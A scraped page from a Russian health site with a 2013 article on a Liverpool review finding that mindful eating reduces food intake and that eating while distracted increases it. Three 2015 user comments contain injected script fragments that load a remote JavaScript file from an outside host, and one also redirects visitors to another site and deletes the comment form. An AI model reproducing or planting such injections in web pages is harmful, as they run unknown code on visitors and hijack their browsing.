Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Когда я ем – я глух и нем...  >>  Когда я ем – я глух и нем! Ученые доказали, что это поможет похудеть!
 
Обратная связь
 

Когда я ем – я глух и нем! Ученые доказали, что это поможет похудеть!

Размер шрифта
22 мая 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

К сожалению, в нашем мире хватает людей, которые хотят похудеть, а еще больше тех, кому это необходимо.

Ученые попытались выяснить, как с помощью наших мыслей можно снизить количество съеденного и, напротив, какие факторы заставляют нас усиленно налегать на пищу. Ученые проанализировали 24 работы, которые рассматривали влияние мыслей, внимания, памяти и отвлечения на количество потребляемой пищи.

Как съесть меньше?

Исследователи обнаружили, что более внимательное отношение к еде и приемам пищи позволяет есть меньше, чем обычно. Это наблюдение можно использовать в программах по снижению весу.

Реализовать это предлагается следующим образом: записывайте компоненты своего меню, не выбрасывайте некоторые упаковки продуктов (они будут служить вам напоминанием), сохраняйте в голове визуальный образ ранее съеденной пищи – всё это со временем приведет к снижению порций.

«Мы выяснили, что если человек вспоминает, что предыдущий прием пищи был вполне сытный, в следующий раз он съест меньше», – говорит доктор Эрик Робинсон из Ливерпульского института Психологии, Здоровья и Социума. «В работах, которые мы изучали, рассматривались люди с нормальным индексом массы тела, поэтому еще предстоит выяснить, как всё это работает в отношении людей с ожирением. Другая проблема заключается в том, как именно интегрировать эти теоретически сильные наблюдения в реальную практику».

Не отвлекайтесь!

Все мы слышали поговорку: «Когда я ем – я глух и нем». В данном исследовании была продемонстрирована ее справедливость. Ливерпульские ученые показали, что, отвлекаясь за обеденным столом (например, на просмотр телевизора, радио или газету), мы съедаем больше в текущий момент, но что еще хуже – это затронет и последующие приемы пищи. «Это вполне соответствуют предыдущему пункту нашего исследования: отвлекаясь, человек с меньшим вниманием относится к еде», – говорит Робинсон.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

02 июня 2013 в 19:20

Комментарий удален за нарушение Правил общения

2 - zzzzzz

30 июня 2015 в 19:18

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 19:33

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 23:16

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Сколько завтракать... в шайбах   Профессионал на вашей кухне   Блендеры и миксеры таят в себе страшного микроба, от которого не могут избавиться никакие средства! Что делать?   Сколько мы едим?  
05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная? 21 мая 2013Когда я ем – я глух и нем! Ученые доказали, что это поможет похудеть!
 
03 октября 2013Результаты благотворительного марафона «Всем миром» 08 июля 2013Теперь можно выбрать, какой ребенок у вас будет! ЭКО открывает новые горизонты
 

Слайдшоу

1
Как есть меньше без усилий
Осенняя супереда
Супереда для метаболизма

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.